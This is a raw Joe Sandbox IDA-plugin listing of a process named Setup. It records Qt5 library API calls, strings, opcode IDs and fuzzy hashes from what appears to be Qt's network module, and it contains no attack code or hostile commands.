                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?cast@QMetaObject@@QEBAPEAVQObject@@PEAV2@@Z.QT5CORE ref: 00007FFBA19E481F
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?qEnvironmentVariableIntValue@@YAHPEBDPEA_N@Z.QT5CORE ref: 00007FFBA19E4847
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?keyMap@QFactoryLoader@@QEBA?AV?$QMultiMap@HVQString@@@@XZ.QT5CORE ref: 00007FFBA19E4863
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?QStringList_contains@QtPrivate@@YA_NPEBVQStringList@@AEBVQString@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA19E48C4
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA19E48F5
                                                                                                                                                              • ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFB0C
                                                                                                                                                              • ?moveToThread@QObject@@QEAAXPEAVQThread@@@Z.QT5CORE ref: 00007FFBA19DFB18
                                                                                                                                                              • ?deleteLater@QObject@@QEAAXXZ.QT5CORE ref: 00007FFBA19DFB21
                                                                                                                                                              • ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFB33
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFB67
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19DFB74
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Thread@$Thread@@$Private@@$?main?moveApplicationCoreMetaMutex@@Thread@@@$?lock@Connection@Map@Qt@@@Routine@@StringString@@$?begin@?cast@?connect@?current?delete?key?sender@?set?start@CaseConnectionDaemonData@@EnvironmentFactoryInit_thread_footerLater@ListList@@List_contains@Loader@@Locker@@MultiMutexName@ObjectObject@@@PostPriority@1@@Sensitivity@String@@@String@@@@Type@V0@@V2@@Value@@Variablemalloc
                                                                                                                                                              • String ID: 1addPreAndPostRoutine()$2destroyed()
                                                                                                                                                              • API String ID: 1649926615-3033731886
                                                                                                                                                              • Opcode ID: 84d5c0ed9ee25f8fa6538b5b1bf8e5083d94f58d645708be0756a8083ff4e748
                                                                                                                                                              • Instruction ID: 4abbdefc44749a9711146b16f9184611636beb6dcaaa85d387b33c692d5f438b
                                                                                                                                                              • Opcode Fuzzy Hash: 84d5c0ed9ee25f8fa6538b5b1bf8e5083d94f58d645708be0756a8083ff4e748
                                                                                                                                                              • Instruction Fuzzy Hash: 7141E5A0A0FA4382EB869B31E8651B86361FF44BA4F445136DD2E477A5EF3CE446CF00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$ByteDevice@@$?size@Array@@@ElapsedLongLong@String@@Timer@@V0@@$?append@?elapsed@?ready?restart@?write@Array@@Buffer@@Int@Null@Open@Read@RingV0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 770803935-0
                                                                                                                                                              • Opcode ID: 97a41a2b3998511ed66fd57b1ee93d129f44c6d97e8e37e98a3cc5a970be3b3a
                                                                                                                                                              • Instruction ID: e854f5d97fe249aacde5115826ba3bc8a5de58902466a296b143a19ad3d1ed3b
                                                                                                                                                              • Opcode Fuzzy Hash: 97a41a2b3998511ed66fd57b1ee93d129f44c6d97e8e37e98a3cc5a970be3b3a
                                                                                                                                                              • Instruction Fuzzy Hash: 426164B1A0EA8282EB959F31E4542B96361FB44B9DF444132DE9E476A9DF3CE446CF00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A34C50: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C68
                                                                                                                                                                • Part of subcall function 00007FFBA1A34C50: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34C8D
                                                                                                                                                                • Part of subcall function 00007FFBA1A34C50: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45149), ref: 00007FFBA1A34CA4
                                                                                                                                                                • Part of subcall function 00007FFBA1A32D40: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D58
                                                                                                                                                                • Part of subcall function 00007FFBA1A32D40: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D7D
                                                                                                                                                                • Part of subcall function 00007FFBA1A32D40: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45156), ref: 00007FFBA1A32D94
                                                                                                                                                                • Part of subcall function 00007FFBA1A32E90: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EA8
                                                                                                                                                                • Part of subcall function 00007FFBA1A32E90: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32ECD
                                                                                                                                                                • Part of subcall function 00007FFBA1A32E90: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4518A), ref: 00007FFBA1A32EE4
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?fromLatin1@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FFBA1A41865
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1A41872
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?splitRef@QString@@QEBA?AV?$QVector@VQStringRef@@@@VQChar@@V?$QFlags@W4SplitBehaviorFlags@Qt@@@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1A41892
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A418B2
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?toString@QStringRef@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFBA1A418C0
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A418D0
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A418DB
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A418E6
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?toString@QStringRef@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFBA1A418F5
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A41907
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??8QString@@QEBA_NVQLatin1String@@@Z.QT5CORE ref: 00007FFBA1A4193A
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A41A8D
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?startsWith@QStringRef@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1A41ABF
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1A41ACE
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?mid@QStringRef@@QEBA?AV1@HH@Z.QT5CORE ref: 00007FFBA1A41AE5
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ?toString@QStringRef@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFBA1A41AF3
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A41B03
                                                                                                                                                                • Part of subcall function 00007FFBA1A41810: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A41B0E
                                                                                                                                                                • Part of subcall function 00007FFBA19EFFD0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA1A451C0), ref: 00007FFBA19EFFE3
                                                                                                                                                              • ?toLower@QString@@QEHAA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A451CA
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A451F1
                                                                                                                                                              • ?toLower@QString@@QEHAA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A45216
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A45244
                                                                                                                                                              • ?toLower@QString@@QEHAA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A45265
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQLatin1String@@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A4528C
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452AA
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452BC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452CE
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452E0
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452EA
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A452F7
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Latin1Logger@@MessageString$CaseQt@@@Ref@@Sensitivity@$?data@?startsArrayData@@V0@@With@$?warning@Category@@Enabled@H00@LoggingLower@String@Warning$Char@@DateFlags@Time@@V0@$$$?from?mid@?splitArray@@BehaviorByteChar@@@Latin1@Qt@@@@Ref@Ref@@@@SplitString@@@Vector@
                                                                                                                                                              • String ID: adh$aecdh$exp-adh
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@Variant@@$Meta$Connection@Device@@Logger@@MessageOpen@$?class?connect@?critical@?free_helper@ConnectionData@@HashInt@Name@Node@1@@Qt@@@Type@V0@@Valid@
                                                                                                                                                              • String ID: 1_q_cacheSaveDeviceAboutToClose()$2aboutToClose()$QNetworkReplyImpl: network cache returned a device that is not open -- class %s probably needs to be fixed
                                                                                                                                                              APIs
                                                                                                                                                              • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFBA197B85B
                                                                                                                                                                • Part of subcall function 00007FFBA197CAF0: ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE(?,?,?,00007FFBA197B899), ref: 00007FFBA197CB21
                                                                                                                                                              • ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE ref: 00007FFBA197B8BA
                                                                                                                                                              • ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA197B8E2
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B902
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197B91D
                                                                                                                                                              • ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA197B941
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197B973
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA197B988
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197B9A1
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197B9AD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197B9C0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9E0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA197B9ED
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Array@@ByteTime@@$BasicData@@HashHash@@Logger@@MessageString@@Timer@@V0@@$?allocate?current?data@?secs?start@?stop@?warning@?willChar@@Grow@Node@Object@@@TimeUtc@V1@@Xlength_error@std@@
                                                                                                                                                              • String ID: QNetworkAccessCache::addEntry: overriding active cache entry '%s'$vector<T> too long
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@$ConverterFunction@Type@@$?registerInit_thread_footer$?class?has?reserve@AbstractCriticalEnterFlag@Flags@Name@NormalizedObject@@Object@@@Private@@RegisteredSectionString@@TypeType@Type@@@@
                                                                                                                                                              • String ID: '$QSharedPointer
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972A6D
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?scheme@Empty@Mutex@@
                                                                                                                                                              • String ID: auth:
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Dir@@$Settings@@StandardString@@@$?absolute?set?shared?writableArrayArray@@ByteData@@Empty@Enabled@FallbacksFileFormat@0@Latin1Location@Location@1@@Null@Object@@@Path@Paths@@V0@@V2@@
                                                                                                                                                              • String ID: hstsstore
                                                                                                                                                              APIs
                                                                                                                                                              • ?isOpen@QIODevice@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989870
                                                                                                                                                              • ?reserve@QRingBuffer@@QEAAPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA19898E1
                                                                                                                                                              • ?read@QIODevice@@QEAA_JPEAD_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA19898F0
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989909
                                                                                                                                                              • ?chop@QRingBuffer@@QEAAX_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA198996D
                                                                                                                                                              • ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A12
                                                                                                                                                              • ??0QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A1F
                                                                                                                                                              • ?toLongLong@QVariant@@QEBA_JPEA_N@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A36
                                                                                                                                                              • ??0QVariant@@QEAA@_J@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A4B
                                                                                                                                                              • ??4QVariant@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A5B
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A66
                                                                                                                                                              • ?readyRead@QIODevice@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A76
                                                                                                                                                              • ?elapsed@QElapsedTimer@@QEBA_JXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A83
                                                                                                                                                              • ?restart@QElapsedTimer@@QEAA_JXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989A9C
                                                                                                                                                              • ?isNull@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989AA7
                                                                                                                                                              • ?toLongLong@QVariant@@QEBA_JPEA_N@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989AC1
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA198B45D), ref: 00007FFBA1989AE6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Buffer@@Device@@Ring$?chop@ElapsedLongLong@Timer@@V0@@$?elapsed@?read@?ready?reserve@?restart@Null@Open@Read@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1573155983-0
                                                                                                                                                              • Opcode ID: 45c283c16b818476f01e14dcf60a65c97260e83598a9bf03065d406db6bea718
                                                                                                                                                              • Instruction ID: 762f4f33e90992b9999ccddc56231abd9ab342af1e86e7531e1c385754798535
                                                                                                                                                              • Opcode Fuzzy Hash: 45c283c16b818476f01e14dcf60a65c97260e83598a9bf03065d406db6bea718
                                                                                                                                                              • Instruction Fuzzy Hash: 577132B260AA4281EF919F36D4542B96362FB89FE8F084132DE5E477A5DF3DD446CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E465F
                                                                                                                                                              • ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E4685
                                                                                                                                                              • ?qEnvironmentVariableIntValue@@YAHPEBDPEA_N@Z.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E46A5
                                                                                                                                                              • ?setInterval@QTimer@@QEAAXH@Z.QT5CORE ref: 00007FFBA19E46BE
                                                                                                                                                              • ?setSingleShot@QTimer@@QEAAX_N@Z.QT5CORE ref: 00007FFBA19E46CA
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19E46F7
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19E4702
                                                                                                                                                              • ?isActive@QTimer@@QEBA_NXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E470C
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E471F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E472C
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ?start@QTimer@@QEAAXXZ.QT5CORE(?,?,00000020,?,00000000,00007FFBA19E4DB8), ref: 00007FFBA19E4771
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Timer@@$Object@@$?setConnection@Data@@ListMeta$?begin@?connect@?end@?lock@?start@Active@ConnectionEnvironmentInterval@Mutex@@Object@@@Qt@@@Shot@SingleType@Value@@Variablemalloc
                                                                                                                                                              • String ID: 1pollEngines()$2timeout()$QT_BEARER_POLL_TIMEOUT
                                                                                                                                                              • API String ID: 3802747260-2682786888
                                                                                                                                                              • Opcode ID: 5d06fb88f5b37ae5140e63146ea9c1f2b2164cdc097589948076b3d8f2241058
                                                                                                                                                              • Instruction ID: 0e2a5aa4b62c030cedc29454d8ddb8daa2486645c9318af3ded0a604f1f04f1b
                                                                                                                                                              • Opcode Fuzzy Hash: 5d06fb88f5b37ae5140e63146ea9c1f2b2164cdc097589948076b3d8f2241058
                                                                                                                                                              • Instruction Fuzzy Hash: 53316DA5A0AB4289EF82DF31E8441B87761FB85BA8F444432DD5E477A4EF3CD449CB40
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Char@@$?data@?size@AddressString@Utils@@$?append@Char@@@Empty@Initialization@Latin1Qt@@@V1@@memmove
                                                                                                                                                              • String ID: %
                                                                                                                                                              • API String ID: 1742880359-2567322570
                                                                                                                                                              • Opcode ID: e09c7d8934324f2c313aecc06aff517460fdad77bb9b11fca39f6d873715fda5
                                                                                                                                                              • Instruction ID: fbe5ea017f1f10280d31caa20f90f34cd1ed451224338db5e34504d21da985f2
                                                                                                                                                              • Opcode Fuzzy Hash: e09c7d8934324f2c313aecc06aff517460fdad77bb9b11fca39f6d873715fda5
                                                                                                                                                              • Instruction Fuzzy Hash: 69217F62A0EA9686DB418F22E854178A761FF89FA5F444032DE5E07758EF3CE059CF10
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Mutex@@$String@@$??8@?unlock@Hash@@String@@0@$?lock@Data@@List$?begin@?end@Recursive
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 149806509-0
                                                                                                                                                              • Opcode ID: 95fbad68283a8b38f93b9751e882fe8ab0f2f1b31b0876fbd699108b119a0483
                                                                                                                                                              • Instruction ID: 8f8e8459b0864a04dec945516e6c5b64b4c152a1e4dcd44d3f9e852c5b046923
                                                                                                                                                              • Opcode Fuzzy Hash: 95fbad68283a8b38f93b9751e882fe8ab0f2f1b31b0876fbd699108b119a0483
                                                                                                                                                              • Instruction Fuzzy Hash: A99184B6A0A74682EB96CB66D00467837A5FB49F98F454535CE1E473D0DF3CE896CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40E2A
